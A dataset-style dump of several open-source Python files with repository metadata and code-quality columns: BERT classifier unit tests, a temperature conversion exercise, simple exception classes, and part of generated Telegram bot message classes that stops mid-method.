hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8356dc9872ae7a470409d14cbf24f45790d817c7
| 6,928
|
py
|
Python
|
tests/modules/classifiers/bert_classifier_test.py
|
dyoshioka-555/texar
|
314ae5d31faef8658e9130e7686066c995d82c67
|
[
"Apache-2.0"
] | 2,325
|
2018-08-29T19:34:09.000Z
|
2022-03-26T18:11:58.000Z
|
tests/modules/classifiers/bert_classifier_test.py
|
dyoshioka-555/texar
|
314ae5d31faef8658e9130e7686066c995d82c67
|
[
"Apache-2.0"
] | 183
|
2018-08-30T02:17:45.000Z
|
2022-02-23T13:53:58.000Z
|
tests/modules/classifiers/bert_classifier_test.py
|
dyoshioka-555/texar
|
314ae5d31faef8658e9130e7686066c995d82c67
|
[
"Apache-2.0"
] | 421
|
2018-08-29T20:00:16.000Z
|
2022-03-08T13:32:03.000Z
|
"""
Unit tests for BERT classifiers.
"""
import numpy as np
import tensorflow as tf
from texar.tf.modules.classifiers.bert_classifier import BERTClassifier
from texar.tf.utils.test import pretrained_test
# pylint: disable=too-many-locals, no-member
class BERTClassifierTest(tf.test.TestCase):
    """Tests :class:`~texar.tf.modules.BERTClassifier` class.
    """

    @pretrained_test
    def test_model_loading(self):
        r"""Tests model loading functionality."""
        # [batch_size, seq_len] int32 token ids; both dims left dynamic.
        inputs = tf.placeholder(dtype=tf.int32, shape=[None, None])
        # Build one classifier per available pretrained checkpoint and make
        # sure a forward pass can be constructed.
        for pretrained_model_name in BERTClassifier.available_checkpoints():
            classifier = BERTClassifier(
                pretrained_model_name=pretrained_model_name)
            _, _ = classifier(inputs)

    def test_trainable_variables(self):
        """Tests the functionality of automatically collecting trainable
        variables.
        """
        inputs = tf.placeholder(dtype=tf.int32, shape=[None, None])

        # case 1: default classifier built from scratch (no pretrained weights).
        hparams = {
            "pretrained_model_name": None,
        }
        clas = BERTClassifier(hparams=hparams)
        _, _ = clas(inputs)
        # 199 + 2: presumably 199 variables from the BERT encoder plus 2
        # (kernel + bias) from the classification layer — TODO confirm.
        self.assertEqual(len(clas.trainable_variables), 199 + 2)

        # case 2: "all_time" strategy with a fixed maximum sequence length.
        hparams = {
            "pretrained_model_name": None,
            "clas_strategy": "all_time",
            "max_seq_length": 8,
        }
        clas = BERTClassifier(hparams=hparams)
        _, _ = clas(inputs)
        self.assertEqual(len(clas.trainable_variables), 199 + 2)

        # case 3: "time_wise" strategy (original comment mislabeled this
        # as "case 2").
        hparams = {
            "pretrained_model_name": None,
            "clas_strategy": "time_wise",
        }
        clas = BERTClassifier(hparams=hparams)
        _, _ = clas(inputs)
        self.assertEqual(len(clas.trainable_variables), 199 + 2)

    def test_encode(self):
        """Tests encoding.
        """
        max_time = 8
        batch_size = 16
        # maxval=30521: presumably bounded by the BERT vocabulary size —
        # TODO confirm against the tokenizer's vocab.
        inputs = tf.random_uniform([batch_size, max_time],
                                   maxval=30521, dtype=tf.int32)

        # case 1: default strategy → one logit vector per example.
        hparams = {
            "pretrained_model_name": None,
        }
        clas = BERTClassifier(hparams=hparams)
        logits, pred = clas(inputs)
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            logits_, pred_ = sess.run([logits, pred])
            self.assertEqual(logits_.shape, (batch_size,
                                             clas.hparams.num_classes))
            self.assertEqual(pred_.shape, (batch_size, ))

        # case 2: "time_wise" → per-timestep logits and predictions.
        hparams = {
            "pretrained_model_name": None,
            "num_classes": 10,
            "clas_strategy": "time_wise"
        }
        clas = BERTClassifier(hparams=hparams)
        logits, pred = clas(inputs)
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            logits_, pred_ = sess.run([logits, pred])
            self.assertEqual(logits_.shape,
                             (batch_size, max_time, clas.hparams.num_classes))
            self.assertEqual(pred_.shape, (batch_size, max_time))

        # case 3: num_classes=0 → the asserted shape shows raw encoder
        # outputs (dim = encoder.dim) are returned in place of logits.
        hparams = {
            "pretrained_model_name": None,
            "num_classes": 0,
            "clas_strategy": "time_wise"
        }
        clas = BERTClassifier(hparams=hparams)
        logits, pred = clas(inputs)
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            logits_, pred_ = sess.run([logits, pred])
            self.assertEqual(logits_.shape,
                             (batch_size, max_time, clas.hparams.encoder.dim))
            self.assertEqual(pred_.shape, (batch_size, max_time))

        # case 4: "all_time" with actual sequences (length 6) shorter than
        # max_seq_length (8).
        hparams = {
            "pretrained_model_name": None,
            "num_classes": 10,
            "clas_strategy": "all_time",
            "max_seq_length": max_time
        }
        inputs = tf.placeholder(tf.int32, shape=[batch_size, 6])
        clas = BERTClassifier(hparams=hparams)
        logits, pred = clas(inputs)
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            logits_, pred_ = sess.run(
                [logits, pred],
                feed_dict={inputs: np.random.randint(30521,
                                                     size=(batch_size, 6))})
            self.assertEqual(logits_.shape, (batch_size,
                                             clas.hparams.num_classes))
            self.assertEqual(pred_.shape, (batch_size, ))

    def test_binary(self):
        """Tests binary classification.
        """
        max_time = 8
        batch_size = 16
        inputs = tf.random_uniform([batch_size, max_time],
                                   maxval=30521, dtype=tf.int32)

        # case 1: binary (num_classes=1), "time_wise" → logits squeezed to
        # [batch, time] (original comment mislabeled this as "case 2").
        hparams = {
            "pretrained_model_name": None,
            "num_classes": 1,
            "clas_strategy": "time_wise"
        }
        clas = BERTClassifier(hparams=hparams)
        logits, pred = clas(inputs)
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            logits_, pred_ = sess.run([logits, pred])
            self.assertEqual(logits_.shape, (batch_size, max_time))
            self.assertEqual(pred_.shape, (batch_size, max_time))

        # case 2: binary, "cls_time" → one scalar logit per example.
        hparams = {
            "pretrained_model_name": None,
            "num_classes": 1,
            "clas_strategy": "cls_time",
            "max_seq_length": max_time
        }
        inputs = tf.placeholder(tf.int32, shape=[batch_size, 6])
        clas = BERTClassifier(hparams=hparams)
        logits, pred = clas(inputs)
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            logits_, pred_ = sess.run(
                [logits, pred],
                feed_dict={inputs: np.random.randint(30521,
                                                     size=(batch_size, 6))})
            self.assertEqual(logits_.shape, (batch_size, ))
            self.assertEqual(pred_.shape, (batch_size, ))

        # case 3: binary, "all_time" → one scalar logit per example.
        hparams = {
            "pretrained_model_name": None,
            "num_classes": 1,
            "clas_strategy": "all_time",
            "max_seq_length": max_time
        }
        inputs = tf.placeholder(tf.int32, shape=[batch_size, 6])
        clas = BERTClassifier(hparams=hparams)
        logits, pred = clas(inputs)
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            logits_, pred_ = sess.run(
                [logits, pred],
                feed_dict={inputs: np.random.randint(30521,
                                                     size=(batch_size, 6))})
            self.assertEqual(logits_.shape, (batch_size, ))
            self.assertEqual(pred_.shape, (batch_size, ))
if __name__ == "__main__":
    # Run all test cases in this module via TensorFlow's test runner.
    tf.test.main()
| 34.29703
| 78
| 0.553839
| 702
| 6,928
| 5.210826
| 0.143875
| 0.059049
| 0.065063
| 0.071077
| 0.813286
| 0.813286
| 0.813286
| 0.808092
| 0.805905
| 0.766539
| 0
| 0.017916
| 0.339348
| 6,928
| 201
| 79
| 34.467662
| 0.781298
| 0.054417
| 0
| 0.771812
| 0
| 0
| 0.078878
| 0.032352
| 0
| 0
| 0
| 0
| 0.114094
| 1
| 0.026846
| false
| 0
| 0.026846
| 0
| 0.060403
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8358d0baf49a4c748406483746c60c8f791cc815
| 125
|
py
|
Python
|
Python3/ex014.py
|
neilsonfa/cursoemvideo
|
3b8995617f0ee38ac3cf74f79093a9dc6cafc6e8
|
[
"MIT"
] | null | null | null |
Python3/ex014.py
|
neilsonfa/cursoemvideo
|
3b8995617f0ee38ac3cf74f79093a9dc6cafc6e8
|
[
"MIT"
] | null | null | null |
Python3/ex014.py
|
neilsonfa/cursoemvideo
|
3b8995617f0ee38ac3cf74f79093a9dc6cafc6e8
|
[
"MIT"
] | null | null | null |
# Read a temperature in degrees Celsius and print its Fahrenheit equivalent.
C = float(input("Qual a temperatura em graus Celsius?\n"))
# Conversion formula: F = C * 9/5 + 32.
fahrenheit = C * 1.8 + 32
print("A temperatura em graus Fahrenheit é: {}.".format(fahrenheit))
| 62.5
| 66
| 0.704
| 22
| 125
| 4
| 0.772727
| 0.272727
| 0.318182
| 0.431818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036036
| 0.112
| 125
| 2
| 66
| 62.5
| 0.756757
| 0
| 0
| 0
| 0
| 0
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
83672dd6cef847f57ef35c39734f712aec85ea9a
| 681
|
py
|
Python
|
core/errors.py
|
rChen10/pywright
|
a71527b62c072d89c84054b0674b3a65e1227c48
|
[
"BSD-3-Clause"
] | 3
|
2016-03-16T01:10:09.000Z
|
2022-02-20T00:33:04.000Z
|
core/errors.py
|
rChen10/pywright
|
a71527b62c072d89c84054b0674b3a65e1227c48
|
[
"BSD-3-Clause"
] | 1
|
2016-03-16T01:29:57.000Z
|
2016-03-16T01:29:57.000Z
|
core/errors.py
|
rChen10/pywright
|
a71527b62c072d89c84054b0674b3a65e1227c48
|
[
"BSD-3-Clause"
] | 5
|
2016-03-21T02:48:13.000Z
|
2021-08-18T08:58:09.000Z
|
class script_error(Exception):
    """Error raised for problems encountered in game scripts.

    :param value: description of the error; coerced to ``str`` for display,
        so non-string payloads (e.g. ints) are accepted.
    """

    def __init__(self, value):
        # Also initialize Exception so ``e.args`` is populated normally.
        super(script_error, self).__init__(value)
        self.value = value

    def __str__(self):
        # str() coercion: the original returned self.value directly, which
        # raised TypeError when the payload was not a string.
        return str(self.value)

    __repr__ = __str__
class art_error(Exception):
    """Error raised for problems with art assets.

    :param value: description of the error; coerced to ``str`` for display,
        so non-string payloads (e.g. ints) are accepted.
    """

    def __init__(self, value):
        # Also initialize Exception so ``e.args`` is populated normally.
        super(art_error, self).__init__(value)
        self.value = value

    def __str__(self):
        # str() coercion: the original returned self.value directly, which
        # raised TypeError when the payload was not a string.
        return str(self.value)

    __repr__ = __str__
class markup_error(Exception):
    """Error raised for problems in text markup.

    :param value: description of the error; coerced to ``str`` for display,
        so non-string payloads (e.g. ints) are accepted.
    """

    def __init__(self, value):
        # Also initialize Exception so ``e.args`` is populated normally.
        super(markup_error, self).__init__(value)
        self.value = value

    def __str__(self):
        # str() coercion: the original returned self.value directly, which
        # raised TypeError when the payload was not a string.
        return str(self.value)

    __repr__ = __str__
class file_error(Exception):
    """Error raised for problems with files.

    :param value: description of the error; coerced to ``str`` for display,
        so non-string payloads (e.g. ints) are accepted.
    """

    def __init__(self, value):
        # Also initialize Exception so ``e.args`` is populated normally.
        super(file_error, self).__init__(value)
        self.value = value

    def __str__(self):
        # str() coercion: the original returned self.value directly, which
        # raised TypeError when the payload was not a string.
        return str(self.value)

    __repr__ = __str__
class missing_object(script_error):
    """script_error subclass; the name suggests it is raised when a
    referenced object cannot be found — confirm at call sites."""
    pass
class offscreen_text(script_error):
    """script_error subclass; the name suggests it is raised when text
    would be positioned off screen — confirm at call sites."""
    pass
| 32.428571
| 49
| 0.706314
| 88
| 681
| 4.647727
| 0.215909
| 0.264059
| 0.166259
| 0.205379
| 0.792176
| 0.792176
| 0.792176
| 0.792176
| 0.792176
| 0.792176
| 0
| 0
| 0.202643
| 681
| 20
| 50
| 34.05
| 0.753223
| 0
| 0
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.1
| 0
| 0.2
| 0.9
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 11
|
360bddaa6f4acfb557509d05868b38a2c22e74be
| 300,988
|
py
|
Python
|
code_generation/output/teleflask_messages.py
|
luckydonald/pytgbot
|
2fd6072e99f2656d335059fc0a1478b2a62f0c4c
|
[
"MIT"
] | 52
|
2015-06-25T15:48:19.000Z
|
2021-08-10T20:29:11.000Z
|
code_generation/output/teleflask_messages.py
|
luckydonald/pytgbot
|
2fd6072e99f2656d335059fc0a1478b2a62f0c4c
|
[
"MIT"
] | 16
|
2016-04-12T08:11:30.000Z
|
2021-07-22T18:00:07.000Z
|
code_generation/output/teleflask_messages.py
|
luckydonald/pytgbot
|
2fd6072e99f2656d335059fc0a1478b2a62f0c4c
|
[
"MIT"
] | 14
|
2015-06-26T15:29:48.000Z
|
2021-08-10T20:29:14.000Z
|
# -*- coding: utf-8 -*-
from luckydonaldUtils.logger import logging
from luckydonaldUtils.encoding import unicode_type, to_unicode as u
from luckydonaldUtils.exceptions import assert_type_or_raise
from pytgbot.api_types.receivable.updates import Message as PytgbotApiMessage
from pytgbot.exceptions import TgApiServerException
from pytgbot.api_types import TgBotApiObject
from pytgbot.bot import Bot as PytgbotApiBot
from abc import abstractmethod
__author__ = "luckydonald"
logger = logging.getLogger(__name__)
# noinspection PyPep8Naming
class DEFAULT_MESSAGE_ID(object):
    """
    Used for reply_id.

    Sentinel: the class object itself (not an instance) marks a reply_id
    that was left at its default; code checks it with identity comparison,
    ``reply_id is DEFAULT_MESSAGE_ID``.
    """
    pass
# end class
class ReturnableMessageBase(object):
    """
    Base class for messages that can be returned from a handler and sent
    later. Subclasses implement :meth:`actual_send`; :meth:`send` retries
    once without ``reply_to`` when the replied-to message no longer exists.
    """

    def _apply_update_receiver(self, receiver, reply_id):
        """
        Updates `self.receiver` and/or `self.reply_id` if they still contain the default value.

        :param receiver: The receiver `chat_id` to use.
                         Either `self.receiver`, if set, e.g. when instancing `TextMessage(receiver=10001231231, ...)`,
                         or the `chat.id` of the update context, being the id of groups or the user's `from_peer.id` in private messages.
        :type  receiver: None | str|unicode | int

        :param reply_id: Reply to that `message_id` in the chat we send to.
                         Either `self.reply_id`, if set, e.g. when instancing `TextMessage(reply_id=123123, ...)`,
                         or the `message_id` of the update which triggered the bot's functions.
        :type  reply_id: DEFAULT_MESSAGE_ID | int | None
        """
        # Fill in only the values the user left at their defaults.
        if self.receiver is None:
            self.receiver = receiver
        if self.reply_id is DEFAULT_MESSAGE_ID:
            self.reply_id = reply_id

    @abstractmethod
    def send(self, sender: PytgbotApiBot) -> PytgbotApiMessage:
        try:
            return self.actual_send(sender)
        except TgApiServerException as e:
            # Retry without reply_to only for the specific "reply message
            # not found" server error; re-raise everything else.
            retryable = (
                e.error_code == 400
                and e.description.startswith('bad request')
                and 'reply message not found' in e.description
            )
            if not retryable:
                raise e
            logger.debug('Trying to resend without reply_to.')
            return self.actual_send(sender, ignore_reply=True)

    def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
        # Subclasses must provide the concrete API call.
        raise NotImplementedError("Overwrite this function.")

    def to_array(self) -> dict:
        # Base serialization: no fields of its own.
        return dict()
class TextMessage(ReturnableMessageBase):
    """
    Use this method to send text messages. On success, the sent Message is returned.

    https://core.telegram.org/bots/api#sendmessage

    Parameters:

    :param text: Text of the message to be sent, 1-4096 characters after entities parsing
    :type  text: str|unicode

    Optional keyword parameters:

    :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
    :type  receiver: str|unicode | int

    :param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
    :type  reply_id: DEFAULT_MESSAGE_ID | int

    :param parse_mode: Mode for parsing entities in the message text. See formatting options for more details.
    :type  parse_mode: str|unicode

    :param entities: A JSON-serialized list of special entities that appear in message text, which can be specified instead of parse_mode
    :type  entities: list of pytgbot.api_types.receivable.media.MessageEntity

    :param disable_web_page_preview: Disables link previews for links in this message
    :type  disable_web_page_preview: bool

    :param disable_notification: Sends the message silently. Users will receive a notification with no sound.
    :type  disable_notification: bool

    :param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
    :type  allow_sending_without_reply: bool

    :param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
    :type  reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
    """

    def __init__(self, text, receiver=None, reply_id=DEFAULT_MESSAGE_ID, parse_mode=None, entities=None, disable_web_page_preview=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
        """
        Create a new TextMessage.

        See the class docstring above for the full parameter documentation
        (this generated docstring previously duplicated it verbatim).
        """
        super(TextMessage, self).__init__()
        # NOTE(review): MessageEntity appears unused in this method; the
        # reply_markup imports are needed by assert_type_or_raise below.
        from pytgbot.api_types.receivable.media import MessageEntity
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        assert_type_or_raise(text, unicode_type, parameter_name="text")
        self.text = text
        assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
        self.receiver = receiver
        assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
        self.reply_id = reply_id
        assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
        self.parse_mode = parse_mode
        assert_type_or_raise(entities, None, list, parameter_name="entities")
        self.entities = entities
        assert_type_or_raise(disable_web_page_preview, None, bool, parameter_name="disable_web_page_preview")
        self.disable_web_page_preview = disable_web_page_preview
        assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
        self.disable_notification = disable_notification
        assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
        self.allow_sending_without_reply = allow_sending_without_reply
        assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
        self.reply_markup = reply_markup
        # custom variable for message chaining
        self._next_msg = None
    # end def __init__

    def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
        """
        Send the message via pytgbot.

        :param sender: The bot instance to send with.
        :type  sender: pytgbot.bot.Bot

        :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
        :type  ignore_reply: bool

        :rtype: PytgbotApiMessage
        """
        # NOTE(review): ignore_reply is accepted but never acted upon here —
        # reply_to_message_id is always forwarded; TODO confirm intended.
        return sender.send_message(
            text=self.text,
            chat_id=self.receiver,
            reply_to_message_id=self.reply_id,
            parse_mode=self.parse_mode,
            entities=self.entities,
            disable_web_page_preview=self.disable_web_page_preview,
            disable_notification=self.disable_notification,
            allow_sending_without_reply=self.allow_sending_without_reply,
            reply_markup=self.reply_markup,
        )
    # end def send

    def to_array(self):
        """
        Serializes this TextMessage to a dictionary.

        :return: dictionary representation of this object.
        :rtype: dict
        """
        # NOTE(review): these imports appear unused in this method body
        # (kept as emitted by the code generator).
        from pytgbot.api_types.receivable.media import MessageEntity
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        array = super(TextMessage, self).to_array()
        array['text'] = u(self.text)  # py2: type unicode, py3: type str
        if isinstance(self.receiver, str):
            array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
        elif isinstance(self.receiver, int):
            array['chat_id'] = int(self.receiver)  # type int
        else:
            # NOTE(review): a receiver of None (the documented default in
            # __init__) also lands here and raises — TODO confirm intended.
            raise TypeError('Unknown type, must be one of str, int.')
        # end if
        # NOTE(review): when reply_id was left at its default it holds the
        # DEFAULT_MESSAGE_ID *class* itself (see the `is` comparison in
        # ReturnableMessageBase._apply_update_receiver), so this isinstance()
        # is never True for the default and DEFAULT_MESSAGE_ID(self.reply_id)
        # looks unreachable; the default then falls through to the TypeError
        # below — likely a code-generator bug, TODO confirm.
        if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
            array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
        elif isinstance(self.reply_id, int):
            array['reply_to_message_id'] = int(self.reply_id)  # type int
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
        # end if
        # NOTE(review): unlike validate_array below, these fields are not
        # guarded against None before conversion — TODO confirm u(None) and
        # bool(None) produce the intended serialized values.
        array['parse_mode'] = u(self.parse_mode)  # py2: type unicode, py3: type str
        array['entities'] = PytgbotApiBot._as_array(self.entities)  # type list of MessageEntity
        array['disable_web_page_preview'] = bool(self.disable_web_page_preview)  # type bool
        array['disable_notification'] = bool(self.disable_notification)  # type bool
        array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
        if isinstance(self.reply_markup, InlineKeyboardMarkup):
            array['reply_markup'] = self.reply_markup.to_array()  # type InlineKeyboardMarkup
        elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
            array['reply_markup'] = self.reply_markup.to_array()  # type ReplyKeyboardMarkup
        elif isinstance(self.reply_markup, ReplyKeyboardRemove):
            array['reply_markup'] = self.reply_markup.to_array()  # type ReplyKeyboardRemove
        elif isinstance(self.reply_markup, ForceReply):
            array['reply_markup'] = self.reply_markup.to_array()  # type ForceReply
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
        # end if
        return array
    # end def to_array

    @staticmethod
    def validate_array(array):
        """
        Builds a new array with valid values for the TextMessage constructor.

        :return: new array with valid values
        :rtype: dict
        """
        assert_type_or_raise(array, dict, parameter_name="array")
        from pytgbot.api_types.receivable.media import MessageEntity
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        # NOTE(review): ReturnableMessageBase as defined in this file has no
        # validate_array(), so this super call would raise AttributeError —
        # TODO confirm against the real base class in the repository.
        data = super(TextMessage, TextMessage).validate_array(array)
        data['text'] = u(array.get('text'))
        if array.get('chat_id') is None:
            data['receiver'] = None
        elif isinstance(array.get('chat_id'), str):
            data['receiver'] = u(array.get('chat_id'))
        elif isinstance(array.get('chat_id'), int):
            data['receiver'] = int(array.get('chat_id'))
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        # NOTE(review): isinstance(..., DEFAULT_MESSAGE_ID) is only True for
        # an *instance* of the sentinel class, while the rest of the file
        # stores the class object itself — this branch looks unreachable;
        # TODO confirm.
        if array.get('reply_to_message_id') is None:
            data['reply_id'] = None
        elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
            data['reply_id'] = DEFAULT_MESSAGE_ID
        elif isinstance(array.get('reply_to_message_id'), int):
            data['reply_id'] = int(array.get('reply_to_message_id'))
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
        # end if
        data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
        data['entities'] = MessageEntity.from_array_list(array.get('entities'), list_level=1) if array.get('entities') is not None else None
        data['disable_web_page_preview'] = bool(array.get('disable_web_page_preview')) if array.get('disable_web_page_preview') is not None else None
        data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
        data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
        if array.get('reply_markup') is None:
